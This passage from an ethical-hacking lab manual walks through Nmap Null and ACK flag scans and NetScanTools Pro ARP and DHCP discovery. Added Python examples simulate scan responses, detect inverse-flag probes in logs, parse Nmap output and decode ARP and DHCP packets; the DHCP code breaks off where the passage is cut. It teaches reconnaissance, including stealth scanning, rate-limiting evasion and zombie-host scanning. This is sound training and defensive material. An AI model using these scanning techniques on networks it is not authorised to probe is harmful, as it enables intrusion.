Increasing send delay for 10.0.0.4 from 0 to 5 due to 68 out of 169 dropped probes since last increase.
Completed NULL Scan at 16:47, 7.78s elapsed (1000 total ports)
Initiating Service scan at 16:47
Initiating OS detection (try #1) against 10.0.0.4
NSE: Script scanning 10.0.0.4.
Initiating NSE at 16:47
Completed NSE at 16:47, 0.00s elapsed
Nmap scan report for 10.0.0.4
Host is up (0.000068s latency).
FIGURE 6.26: The Zenmap main window with the Nmap Output tab
35. Click the Host Details tab to view the details of hosts, such as Host Status, Addresses, Open Ports, and Closed Ports.
[Host Details tab for 10.0.0.4 after the Null scan. Host Status: State: up; Open ports: 0; Filtered ports: 0; Closed ports: 1000; Scanned ports: 1000; Uptime: Not available; Last boot: Not available. Addresses: IPv4: 10.0.0.4; IPv6: Not available; MAC: 00:15:5D:00:07:10.]
FIGURE 6.27: The Zenmap main window with the Host Details tab
36. Attackers send an ACK probe packet with a random sequence number. No response means the port is filtered, and an RST response means the port is not filtered.
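The response rules behind step 27 (Null scan) and step 36 (ACK probe) can be checked without touching a network. The Python script below is an added example written for this lab; it is not code from the CEH manual or from Nmap. SAMPLE_HOST and the functions host_response, interpret and scan_host are its own constructions: host_response plays the part of the target's TCP stack, first as RFC 793 describes it and then as a stack that answers every non-SYN probe with RST, which is why the Null scan in this lab reported all 1000 ports on the Windows target as closed even though the earlier Intense scan had found 135, 139 and 445 open.

```python
"""RFC 793 response model for the inverse-flag scans (Null, FIN, Xmas) and
the ACK scan used in this lab.

Added example for the lab text; it is not code from the CEH manual or from
Nmap, and it sends nothing on the wire. The target is a constructed table of
port states, and the host's TCP stack is simulated by host_response().
"""
from typing import Dict, Optional

# TCP flag bits as laid out in the TCP header (RFC 793, section 3.1)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag sets carried by the probes of each Nmap scan type covered in the lab
PROBES = {
    "null": 0,                 # -sN: no flags at all
    "fin": FIN,                # -sF
    "xmas": FIN | PSH | URG,   # -sX: FIN, PSH and URG "lit up"
    "ack": ACK,                # -sA: a bare ACK
}


def host_response(port_state: str, flags: int, compliant: bool = True) -> Optional[str]:
    """Return "RST" or None (silence) for one probe hitting one port.

    port_state is "open", "closed" or "filtered" (a firewall dropped the probe,
    so the stack never saw it). compliant=True follows RFC 793; compliant=False
    models stacks such as Windows that reset every non-SYN probe regardless of
    port state, so inverse-flag scans report everything as closed.
    """
    if port_state == "filtered":
        return None
    if port_state == "closed":
        return "RST"                 # a closed port always resets
    if flags & ACK:
        return "RST"                 # out-of-window ACK on an open port -> RST
    # open port, no SYN/RST/ACK bits: RFC 793 drops the segment silently
    return None if compliant else "RST"


def interpret(scan: str, reply: Optional[str]) -> str:
    """Map a reply (or its absence) to the state Nmap reports for that scan."""
    if scan == "ack":
        # the ACK scan tells filtered from unfiltered, never open from closed
        return "unfiltered" if reply == "RST" else "filtered"
    # Null/FIN/Xmas: RST means closed; silence is ambiguous (open or filtered)
    return "closed" if reply == "RST" else "open|filtered"


def scan_host(host: Dict[int, str], scan: str, compliant: bool = True) -> Dict[int, str]:
    """Run one scan type against the constructed host; returns port -> reported state."""
    flags = PROBES[scan]
    return {port: interpret(scan, host_response(state, flags, compliant))
            for port, state in host.items()}


# Constructed target: three ports in three different true states
SAMPLE_HOST = {135: "open", 80: "closed", 22: "filtered"}

if __name__ == "__main__":
    for name in PROBES:
        print(f"{name:5} RFC 793 host: {scan_host(SAMPLE_HOST, name)}")
    print("null  Windows-like host:", scan_host(SAMPLE_HOST, "null", compliant=False))
```

Run it directly to print the table for all four probe types. The point for the defender: a Null or Xmas scan never completes a handshake, so it leaves nothing in connection logs, and its result is only ever "closed" or "open|filtered"; the ACK scan separates filtered from unfiltered but never open from closed, which is exactly the "All 1000 scanned ports ... are unfiltered" line shown later in Figure 6.33.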
The option --version-trace (Trace version scan activity) causes Nmap to print out extensive debugging info about what version scanning is doing. It is a subset of what you get with --packet-trace.
TASK 4: ACK Flag Scan
37. To perform an ACK Flag Scan for a target IP address, create a new profile. Click Profile -> New Profile or Command Ctrl+P.
The --script-updatedb option updates the script database found in scripts/script.db, which is used by Nmap to determine the available default scripts and categories. It is necessary to update the database only if you have added or removed NSE scripts from the default scripts directory or if you have changed the categories of any script. This option is generally used by itself: nmap --script-updatedb.
FIGURE 6.28: The Zenmap main window with the New Profile or Command option
38. On the Profile tab, input ACK Flag Scan in the Profile name text field.
[Profile Editor, Profile tab: Profile name: ACK Flag Scan; Description (help text: "The description is a full description of what the scan does, which may be long.").]
FIGURE 6.29: The Zenmap Profile Editor window with the Profile tab
39. To select the parameters for an ACK scan, click the Scan tab in the Profile Editor window, select ACK scan (-sA) from the Non-TCP scans: drop-down list, and select None for all the other fields but leave the Targets: field empty.
The options --min-parallelism <numprobes> and --max-parallelism <numprobes> (Adjust probe parallelization) control the total number of probes that may be outstanding for a host group. They are used for port scanning and host discovery. By default, Nmap calculates an ever-changing ideal parallelism based on network performance.
[Profile Editor, Scan tab: Targets (optional): 10.0.0.4; TCP scan: ACK scan (-sA); Non-TCP scans: None; Enable all advanced/aggressive options checked (help text: "Enable OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute).").]
The options --min-rtt-timeout <time>, --max-rtt-timeout <time> and --initial-rtt-timeout <time> (Adjust probe timeouts): Nmap maintains a running timeout value for determining how long it waits for a probe response before giving up or retransmitting the probe. This is calculated based on the response times of previous probes.
FIGURE 6.30: The Zenmap Profile Editor window with the Scan tab
40. Now click the Ping tab and check IPProto probes (-PO) to probe the IP address, and then click Save Changes.
[Profile Editor, Ping tab. Ping options: Don't ping before scanning (-Pn); ICMP ping (-PE); ICMP timestamp request (-PP); ICMP netmask request (-PM); ACK ping (-PA); SYN ping (-PS); UDP probes (-PU); IPProto probes (-PO), checked; SCTP INIT ping probes (-PY). Help text for ICMP timestamp request: "Send an ICMP timestamp probe to see if targets are up."]
The option --max-retries <numtries> (Specify the maximum number of port scan probe retransmissions): When Nmap receives no response to a port scan probe, it can mean the port is filtered. Or maybe the probe or response was simply lost on the network.
FIGURE 6.31: The Zenmap Profile Editor window with the Ping tab
41. In the Zenmap main window, input the IP address of the target machine (in this Lab: 10.0.0.3), select ACK Flag Scan from the Profile: drop-down list, and then click Scan.
The option --host-timeout <time> (Give up on slow target hosts): Some hosts simply take a long time to scan. This may be due to poorly performing or unreliable networking hardware or software, packet rate limiting, or a restrictive firewall. The slowest few percent of the scanned hosts can eat up a majority of the scan time.
42. Nmap scans the target IP address provided and displays the results on the Nmap Output tab.
The options --scan-delay <time> and --max-scan-delay <time> (Adjust delay between probes): This option causes Nmap to wait at least the given amount of time between each probe it sends to a given host. This is particularly useful in the case of rate limiting.
43. To view more details regarding the hosts, click the Host Details tab.
Nmap Output tab (Target: 10.0.0.4, Profile: ACK Flag Scan, Command: nmap -sA -PO 10.0.0.4):
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 17:03 India Standard Time
Nmap scan report for 10.0.0.4
Host is up (0.0000030s latency).
All 1000 scanned ports on 10.0.0.4 are unfiltered
MAC Address: 00:15:5D:00:07:10 (Microsoft)
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
FIGURE 6.33: The Zenmap main window with the Nmap Output tab
[Zenmap main window with Target: 10.0.0.4 and Profile: ACK Flag Scan entered, Command: nmap -sA -PO 10.0.0.4.]
FIGURE 6.32: The Zenmap main window with the Target and Profile entered
[Host Details tab for 10.0.0.4 after the ACK Flag Scan. Host Status: State: up; Open ports, Filtered ports and Closed ports show no count (all 1000 scanned ports are unfiltered); Scanned ports: 1000; Uptime: Not available; Last boot: Not available. Addresses: IPv4: 10.0.0.4; IPv6: Not available; MAC: 00:15:5D:00:07:10.]
The options --min-rate <number> and --max-rate <number> (Directly control the scanning rate): Nmap's dynamic timing does a good job of finding an appropriate speed at which to scan. Sometimes, however, you may happen to know an appropriate scanning rate for a network, or you may have to guarantee that a scan finishes by a certain time.
FIGURE 6.34: The Zenmap main window with the Host Details tab
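Because the Null and Xmas probes used in this lab carry flag combinations that never occur in a legitimate TCP conversation, a plain packet-filter log is enough to spot them; the ACK probe is the exception, since a bare ACK looks like ordinary mid-connection traffic. The script below is an added example for this lab, not part of the manual and not taken from any product. SAMPLE_LOG is a constructed log in a key=value layout of its own invention, and classify_probe and detect_inverse_flag_scans are hypothetical names.

```python
"""Detect Null, FIN and Xmas probes in packet-filter logs.

Added example for this lab (not from the CEH manual or any product). It runs
over a small constructed log in a key=value format of our own, where `flags`
lists the TCP flags set using the letters F S R P A U, or "-" for none.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

LINE_RE = re.compile(
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) proto=tcp dport=(?P<dport>\d+) flags=(?P<flags>\S+)"
)

# Constructed sample: a Null scan and a short Xmas scan from 10.0.0.7 against
# 10.0.0.4, followed by a normal three-way handshake from 10.0.0.2 to port 445.
SAMPLE_LOG = """\
2012-08-24T16:47:01 src=10.0.0.7 dst=10.0.0.4 proto=tcp dport=135 flags=-
2012-08-24T16:47:01 src=10.0.0.7 dst=10.0.0.4 proto=tcp dport=139 flags=-
2012-08-24T16:47:01 src=10.0.0.7 dst=10.0.0.4 proto=tcp dport=445 flags=-
2012-08-24T16:47:02 src=10.0.0.7 dst=10.0.0.4 proto=tcp dport=80 flags=-
2012-08-24T16:47:02 src=10.0.0.7 dst=10.0.0.4 proto=tcp dport=22 flags=-
2012-08-24T16:47:02 src=10.0.0.7 dst=10.0.0.4 proto=tcp dport=21 flags=-
2012-08-24T16:29:10 src=10.0.0.7 dst=10.0.0.4 proto=tcp dport=135 flags=FPU
2012-08-24T16:29:10 src=10.0.0.7 dst=10.0.0.4 proto=tcp dport=139 flags=FPU
2012-08-24T16:29:11 src=10.0.0.7 dst=10.0.0.4 proto=tcp dport=445 flags=FPU
2012-08-24T16:30:00 src=10.0.0.2 dst=10.0.0.4 proto=tcp dport=445 flags=S
2012-08-24T16:30:00 src=10.0.0.4 dst=10.0.0.2 proto=tcp dport=49152 flags=SA
2012-08-24T16:30:01 src=10.0.0.2 dst=10.0.0.4 proto=tcp dport=445 flags=A
"""


def classify_probe(flags: str) -> Optional[str]:
    """Name the inverse-flag probe a packet is, or None for anything else.

    Only flag combinations that never occur in a legitimate TCP exchange are
    flagged: no flags at all (Null), exactly FIN+PSH+URG (Xmas) or a lone FIN.
    A bare ACK (the ACK scan) cannot be told from ordinary mid-connection
    traffic without connection state, so it is deliberately not flagged here.
    """
    bits = set(flags) - {"-"}
    if not bits:
        return "null"
    if bits == {"F", "P", "U"}:
        return "xmas"
    if bits == {"F"}:
        return "fin"
    return None


def detect_inverse_flag_scans(log_text: str, threshold: int = 5) -> Dict[Tuple[str, str], List[int]]:
    """Return {(source, probe_kind): sorted ports} for every source that sent
    one kind of inverse-flag probe to at least `threshold` distinct ports."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        kind = classify_probe(m["flags"])
        if kind:
            hits[(m["src"], kind)].add(int(m["dport"]))
    return {key: sorted(ports) for key, ports in sorted(hits.items())
            if len(ports) >= threshold}


if __name__ == "__main__":
    for (src, kind), ports in detect_inverse_flag_scans(SAMPLE_LOG).items():
        print(f"ALERT {kind} scan from {src}: {len(ports)} ports {ports}")
```

With the default threshold of five distinct ports the sample raises one alert, for the Null scan; lowering the threshold to three also surfaces the short Xmas burst. The threshold is the knob that trades missed slow scans (compare the --scan-delay and --max-rate options in the margins, which an attacker can use to stay under it) against false alarms from a single malformed packet.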
Lab Analysis
Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.
Tool/Utility: Nmap
Information Collected/Objectives Achieved:
Types of Scan used:
■ Intense scan
■ Xmas scan
■ Null scan
■ ACK Flag scan
Intense Scan - Nmap Output:
■ ARP Ping Scan - 1 host
■ Parallel DNS resolution of 1 host
■ SYN Stealth Scan
  • Discovered open port on 10.0.0.4
    o 135/tcp, 139/tcp, 445/tcp, ...
■ MAC Address
■ Operating System Details
■ Uptime Guess
■ Network Distance
■ TCP Sequence Prediction
■ IP ID Sequence Generation
■ Service Info
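Rather than copying the table above from the Zenmap window by hand, the same facts can be pulled out of the Nmap Output text. The parser below is an added example for this lab, not code from Nmap or the CEH manual. SAMPLE_OUTPUT is a constructed transcript modelled on the Null scan of Task 3 (the timings, the send-delay message and the MAC address are taken from that screenshot; the three port lines are invented so the parser has a port table to read), and parse_nmap_verbose and PATTERNS are the example's own names.

```python
"""Turn Nmap's verbose (-v) output into a structured record for the lab report.

Added example; not code from the CEH manual or from Nmap. SAMPLE_OUTPUT is a
constructed transcript in the style of the Null scan shown in this lab; real
-v output from Zenmap's Nmap Output tab can be fed in the same way.
"""
import re
from typing import Any, Dict

SAMPLE_OUTPUT = """\
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 16:47
Initiating ARP Ping Scan at 16:47
Completed ARP Ping Scan at 16:47, 0.14s elapsed (1 total hosts)
Initiating NULL Scan at 16:47
Scanning 10.0.0.4 [1000 ports]
Increasing send delay for 10.0.0.4 from 0 to 5 due to 68 out of 169 dropped probes since last increase.
Completed NULL Scan at 16:47, 7.78s elapsed (1000 total ports)
Nmap scan report for 10.0.0.4
Host is up (0.000068s latency).
Not shown: 997 closed ports
PORT    STATE         SERVICE
135/tcp open|filtered msrpc
139/tcp open|filtered netbios-ssn
445/tcp open|filtered microsoft-ds
MAC Address: 00:15:5D:00:07:10 (Microsoft)
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
"""

# One regex per line type we care about; the delay values are milliseconds.
PATTERNS = {
    "target": re.compile(r"^Nmap scan report for (\S+)"),
    "latency": re.compile(r"^Host is up \(([\d.]+)s latency\)"),
    "phase": re.compile(r"^Completed (.+?) at \d{2}:\d{2}, ([\d.]+)s elapsed"),
    "delay": re.compile(r"^Increasing send delay for (\S+) from (\d+) to (\d+) "
                        r"due to (\d+) out of (\d+) dropped probes"),
    "not_shown": re.compile(r"^Not shown: (\d+) ([\w|]+) ports"),
    "port": re.compile(r"^(\d+)/(tcp|udp|sctp)\s+([\w|]+)\s*(\S*)"),
    "mac": re.compile(r"^MAC Address: ([0-9A-F:]{17})(?: \((.*)\))?"),
    "all_ports": re.compile(r"^All (\d+) scanned ports on \S+ are ([\w|]+)"),
}


def parse_nmap_verbose(text: str) -> Dict[str, Any]:
    """Extract host, timing, rate-limiting and port facts from -v output."""
    rec: Dict[str, Any] = {"phases": {}, "delay_events": [], "ports": {}}
    for line in text.splitlines():
        for name, rx in PATTERNS.items():
            m = rx.match(line)
            if not m:
                continue
            if name == "target":
                rec["target"] = m.group(1)
            elif name == "latency":
                rec["latency_s"] = float(m.group(1))
            elif name == "phase":
                rec["phases"][m.group(1)] = float(m.group(2))
            elif name == "delay":
                dropped, sent = int(m.group(4)), int(m.group(5))
                rec["delay_events"].append({
                    "host": m.group(1), "from_ms": int(m.group(2)),
                    "to_ms": int(m.group(3)), "dropped": dropped, "sent": sent,
                    "drop_ratio": dropped / sent,   # loss that triggered the slowdown
                })
            elif name == "not_shown":
                rec["not_shown"] = (int(m.group(1)), m.group(2))
            elif name == "port":
                rec["ports"][f"{m.group(1)}/{m.group(2)}"] = (m.group(3), m.group(4))
            elif name == "mac":
                rec["mac"], rec["vendor"] = m.group(1), m.group(2)
            elif name == "all_ports":
                rec["all_ports"] = (int(m.group(1)), m.group(2))
            break
    return rec


if __name__ == "__main__":
    import json
    print(json.dumps(parse_nmap_verbose(SAMPLE_OUTPUT), indent=2))
```

The "Increasing send delay ... due to 68 out of 169 dropped probes" line is worth keeping in a report: the drop ratio it yields (about 40 percent here) is what triggered Nmap's adaptive slowdown, and it is the behaviour that the --scan-delay, --max-retries and rate options described in the margins exist to control. Feeding the ACK scan output from Figure 6.33 to the same function fills the all_ports field instead of the port table.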
YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Analyze and evaluate the results by scanning a target network using:
a. Stealth Scan (Half-open Scan)
b. nmap -P
2. Perform Inverse TCP Flag Scanning and analyze hosts and services for a target machine in the network.
Internet Connection Required
□ Yes  ☑ No
Platform Supported
☑ Classroom  ☑ iLabs
Scanning a Network Using the NetScan Tools Pro
NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals.
Lab Scenario
You have already noticed in the previous lab how you can gather information such as ARP ping scan, MAC address, operating system details, IP ID sequence generation, service info, etc. through Intense Scan, Xmas Scan, Null Scan and ACK Flag Scan in Nmap. An attacker can simply scan a target without sending a single packet to the target from their own IP address; instead, they use a zombie host to perform the scan remotely, and if an intrusion detection report is generated, it will display the IP of the zombie host as the attacker. Attackers can easily know how many packets have been sent since the last probe by checking the IP packet fragment identification number (IP ID).
As an expert penetration tester, you should be able to determine whether a TCP port is open by sending a SYN (session establishment) packet to the port. The target machine will respond with a SYN ACK (session request acknowledgement) packet if the port is open and RST (reset) if the port is closed, and you should be prepared to block any such attacks on the network.
In this lab you will learn to scan a network using NetScan Tools Pro. You also need to discover the network and gather information about Internet or local LAN network devices, IP addresses, domains, device ports, and many other network specifics.
Lab Objectives
The objective of this lab is to assist in troubleshooting, diagnosing, monitoring, and discovering devices on the network.
In this lab, you need to:
■ Discover IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs
■ Detect local ports
Lab Environment
To perform the lab, you need:
■ NetScan Tools Pro located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\NetScanTools Pro
■ You can also download the latest version of NetScan Tools Pro from the link http://www.netscantools.com/nstpromain.html
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Administrative privileges to run the NetScan Tools Pro tool
Lab Duration
Time: 10 Minutes
Overview of Network Scanning
Network scanning is the process of examining the activity on a network, which can include monitoring data flow as well as monitoring the functioning of network devices. Network scanning serves to promote both the security and performance of a network. Network scanning may also be employed from outside a network in order to identify potential network vulnerabilities.
NetScan Tools Pro performs the following network scanning functions:
■ Monitoring network device availability
■ Reporting IP addresses, hostnames, domain names, and port scanning
Lab Tasks
Install NetScan Tools Pro on your Windows Server 2012. Follow the wizard-driven installation steps and install NetScan Tools Pro.
1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 7.1: Windows Server 2012 - Desktop view
2. Click the NetScan Tools Pro app to open the NetScan Tools Pro window.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
TASK 1: Scanning the Network
Active Discovery and Diagnostic Tools are tools that you can use to locate and test devices connected to your network. Active discovery means that we send packets to the devices in order to obtain responses.
[Windows Server 2012 Start screen with tiles including Server Manager, Windows PowerShell, Google Chrome, Hyper-V Manager, NetScanTools Pro Demo and Control Panel.]
FIGURE 7.2: Windows Server 2012 - Apps
3. If you are using the Demo version of NetScan Tools Pro, then click Start the DEMO.
4. The Open or Create a New Results Database - NetScanTools Pro window will appear; enter a new database name in Database Name (enter new name here).
5. Set a default directory for the results database file location, and click Continue.
[Open or Create a New Results Database - NetScanTools Pro dialog. NetScanTools Pro automatically saves results in a database; the database is required. Create a new Results Database, open a previous Results Database, or use this software in Training Mode with a temporary Results Database. A NEW Results Database will be automatically prefixed with "NstProData-" and will end with ".db3"; no spaces or periods are allowed when entering a new database name. Fields shown: Database Name (enter new name here): Test; Results Database Directory: C:\Users\Administrator\documents; Project Name (optional); Analyst Information (optional, can be displayed in reports: Name, Title, Organization, Telephone Number, Mobile Number, Email Address). Buttons: Select Another Results Database, Create Training Mode Database, Set Default Directory, Update Analyst Information, Use Last Results Database, Exit Program, Continue.]
FIGURE 7.3: Setting a new database name for NetScan Tools Pro
6. The NetScan Tools Pro main window will appear as shown in the following figure.
The Database Name will be created in the Results Database Directory; it will have NstProData- prefixed and it will have the file extension .db3.
USB Version: start the software by locating nstpro.exe on your USB drive; it is normally in the /nstpro directory.
[Main window of NetScanTools Pro Demo Version Build 8-17-12, based on version 11.19, with the results database "test" open. The left panel groups the tools as Automated Tools, Manual Tools (all), Favorite Tools, Active Discovery Tools, Passive Discovery Tools, DNS Tools, Packet Level Tools, External Tools and Program Info; the welcome text notes that the demo cannot be converted to a full version and that F1 opens the local help.]
FIGURE 7.4: Main window of NetScan Tools Pro
7. Select Manual Tools (all) on the left panel and click ARP Ping. A window will appear with information about the ARP Ping Tool.
8. Click OK.
[About the ARP Ping Tool: Use this tool to "ping" an IPv4 address on your subnet using ARP packets. Use it on your LAN to find the MAC address of a device with an ARP_REQUEST packet even if the device is hidden and does not respond to a regular ping. ARP Ping requires a target IPv4 address on your LAN. Don't miss this special feature in this tool: identify duplicate IPv4 addresses by "pinging" a specific IPv4 address; if more than one device (two or more MAC addresses) responds, you are shown the MAC address of each of the devices. Don't forget to right click in the results for a menu with more options. Demo limitations: None.]
FIGURE 7.5: Selecting manual tools option
9. Select the Send Broadcast ARP, then Unicast ARP radio button, enter the IP address in Target IPv4 Address, and click Send Arp.
IP version 6 addresses have a different format from IPv4 addresses and they can be much longer or far shorter. IPv6 addresses always contain 2 or more colon characters and never contain periods. Example: 2001:4860:b006::69 (ipv6.google.com) or ::1 (internal loopback address).
Arp Ping is a useful tool capable of sending ARP packets to a target IP address, and it can also search for multiple devices sharing the same IP address on your LAN.
[Manual Tools - ARP Ping results. Mode: Send Broadcast ARP, then Unicast ARP (the other modes are Send Broadcast ARP only and Search for Duplicate IP Addresses); Target IPv4 Address: 10.0.0.1; Number to Send and Cycle Time (ms) fields; WinPcap interface selection. The results table has the columns Index, IP Address, MAC Address, Response Time and Type: entry 0 is the Broadcast reply from 10.0.0.1 (0.002649), and entries 1 to 15 are Unicast replies from the same MAC address with response times of roughly 0.002 to 0.008.]
FIGURE 7.6: Result of ARP Ping
10. Click ARP Scan (MAC Scan) in the left panel. A window will appear with information about the ARP Scan tool. Click OK.
Send Broadcast ARP, and then Unicast ARP: this mode first sends an ARP packet to the IPv4 address using the broadcast ARP MAC address. Once it receives a response, it sends subsequent packets to the responding MAC address. The source IP address is your interface IP as defined in the Local IP selection box.
[About the ARP Scan Tool: Use this tool to send an ARP Request to every IPv4 address on your LAN. IPv4 connected devices cannot hide from ARP Scan and must respond with their IP and MAC address. Uncheck the Resolve IPs box for faster scan completion time. Don't forget to right click in the results for a menu with more options. Demo limitations: None.]
ARP Scan (sometimes called a MAC Scan) sends ARP packets to the range of IPv4 addresses specified by the Start and End IP Address entry boxes. The purpose of this tool is to rapidly sweep your subnet for IPv4 connected devices.
FIGURE 7.7: Selecting ARP Scan (MAC Scan) option
11. Enter the range of IPv4 addresses in the Starting IPv4 Address and Ending IPv4 Address text boxes.
12. Click Do Arp Scan.
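What ARP Ping and ARP Scan put on the wire in steps 9 to 12 is a 42-byte Ethernet frame, and the duplicate-address feature described in the ARP Ping dialog is nothing more than noticing two MAC addresses answering for one IP. The script below is an added example for this lab, not NetScanTools Pro code; it builds and decodes such frames with Python's struct module. SAMPLE_REPLIES, SCANNER_MAC, SCANNER_IP and all function names are the example's own constructions, and nothing is transmitted: sending real frames needs a raw socket or WinPcap/Npcap, which the tool itself relies on.

```python
"""Build and parse ARP frames, and spot duplicate IPv4 addresses in replies.

Added example for this lab; it is not NetScanTools Pro code. The frames are
built and parsed with struct only, and the "replies" are constructed inline,
so nothing is sent or captured.
"""
import struct
from collections import defaultdict
from typing import Dict, List, Optional, Set

ETH_P_ARP = 0x0806
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ARP_REQUEST, ARP_REPLY = 1, 2
ARP_FMT = "!HHBBH6s4s6s4s"   # htype ptype hlen plen oper sha spa tha tpa (28 bytes)


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp(oper: int, sender_mac: str, sender_ip: str, target_mac: str,
              target_ip: str, dst_mac: str) -> bytes:
    """Ethernet II header (14 bytes) + ARP packet (28 bytes) = 42 bytes."""
    eth = mac_bytes(dst_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, oper,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def arp_request(sender_mac: str, sender_ip: str, target_ip: str,
                dst_mac: str = BROADCAST_MAC) -> bytes:
    """Who-has target_ip? Broadcast by default; pass the MAC that answered the
    first probe to get the tool's "broadcast, then unicast" mode."""
    return build_arp(ARP_REQUEST, sender_mac, sender_ip,
                     "00:00:00:00:00:00", target_ip, dst_mac)


def arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    return build_arp(ARP_REPLY, sender_mac, sender_ip, target_mac, target_ip, target_mac)


def parse_arp(frame: bytes) -> Optional[Dict[str, object]]:
    """Decode one frame; None for anything that is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"oper": oper, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


def find_duplicate_ips(frames: List[bytes]) -> Dict[str, Set[str]]:
    """IPs claimed by more than one MAC in the replies: a misconfiguration or
    an ARP spoofing attempt, the case the tool's duplicate search reports."""
    claims: Dict[str, Set[str]] = defaultdict(set)
    for frame in frames:
        pkt = parse_arp(frame)
        if pkt and pkt["oper"] == ARP_REPLY:
            claims[pkt["spa"]].add(pkt["sha"])
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


# Constructed replies to probes from the scanner 10.0.0.7 / 00:15:5d:00:07:20:
# 10.0.0.1 answers from two different MACs, 10.0.0.2 from one.
SCANNER_MAC, SCANNER_IP = "00:15:5d:00:07:20", "10.0.0.7"
SAMPLE_REPLIES = [
    arp_reply("00:15:5d:00:07:10", "10.0.0.1", SCANNER_MAC, SCANNER_IP),
    arp_reply("00:0c:29:aa:bb:cc", "10.0.0.1", SCANNER_MAC, SCANNER_IP),
    arp_reply("00:0c:29:12:34:56", "10.0.0.2", SCANNER_MAC, SCANNER_IP),
]

if __name__ == "__main__":
    first = parse_arp(SAMPLE_REPLIES[0])
    print("broadcast probe  :", arp_request(SCANNER_MAC, SCANNER_IP, "10.0.0.1").hex())
    print("unicast follow-up:", arp_request(SCANNER_MAC, SCANNER_IP, "10.0.0.1", first["sha"]).hex())
    print("duplicates       :", find_duplicate_ips(SAMPLE_REPLIES))
```

The duplicate case is the one a defender cares about: two MACs answering for 10.0.0.1 is either a misconfigured second device or someone poisoning ARP caches for the gateway, and the same check run over a periodic ARP scan of the subnet (steps 11 and 12) is a cheap way to catch it.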
The Connection Detection tool listens for incoming connections on TCP or UDP ports. It can also listen for ICMP packets. The sources of the incoming connections are shown in the results list and are logged to a SQLite database.
13. Click DHCP Server Discovery in the left panel; a window will appear with information about the DHCP Server Discovery Tool. Click OK.
DHCP is a method of dynamically assigning IP addresses and other network parameter information to network clients from DHCP servers.
FIGURE 7.9: Selecting DHCP Server Discovery Tool Option
14. Select all the Discover Options check boxes and click Discover DHCP Servers.
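The DHCP Server Discovery tool's ability to find unknown or "rogue" servers comes down to reading the server identifier option out of every DHCPOFFER that answers a DISCOVER and comparing it with the servers you know about. The script below is an added example for this lab, not NetScanTools Pro code; it builds two OFFER packets inline (SAMPLE_OFFERS, with a constructed unauthorised server at 10.0.0.99) using the same RFC 2131 layout it then parses, and build_offer, parse_dhcp and find_rogue_servers are its own names.

```python
"""Parse DHCP OFFERs and flag servers that are not on the authorised list.

Added example for this lab; it is not NetScanTools Pro code and it listens on
no socket: the OFFER packets are constructed inline with the same builder so
the parser has realistic input. Field layout follows RFC 2131 (BOOTP header,
magic cookie, then TLV options).
"""
import struct
from typing import Any, Dict, List, Set

MAGIC_COOKIE = b"\x63\x82\x53\x63"
# op htype hlen hops xid secs flags ciaddr yiaddr siaddr giaddr chaddr sname file (236 bytes)
BOOTP_FMT = "!BBBBIHH4s4s4s4s16s64s128s"
OPT_SUBNET, OPT_ROUTER, OPT_LEASE, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 1, 3, 51, 53, 54, 255
DHCPOFFER = 2


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_offer(xid: int, client_mac: bytes, offered_ip: str, server_ip: str,
                router: str, mask: str, lease: int) -> bytes:
    """Minimal DHCPOFFER as a server would send it (BOOTREPLY, op = 2)."""
    header = struct.pack(BOOTP_FMT, 2, 1, 6, 0, xid, 0, 0,
                         b"\0" * 4, ip_bytes(offered_ip), ip_bytes(server_ip), b"\0" * 4,
                         client_mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    options = (bytes([OPT_MSG_TYPE, 1, DHCPOFFER])
               + bytes([OPT_SERVER_ID, 4]) + ip_bytes(server_ip)
               + bytes([OPT_SUBNET, 4]) + ip_bytes(mask)
               + bytes([OPT_ROUTER, 4]) + ip_bytes(router)
               + bytes([OPT_LEASE, 4]) + struct.pack("!I", lease)
               + bytes([OPT_END]))
    return header + MAGIC_COOKIE + options


def parse_options(data: bytes) -> Dict[int, bytes]:
    """Walk the TLV option area; code 0 is one-byte padding, 255 ends the list."""
    opts, i = {}, 0
    while i < len(data):
        code = data[i]
        if code == OPT_END:
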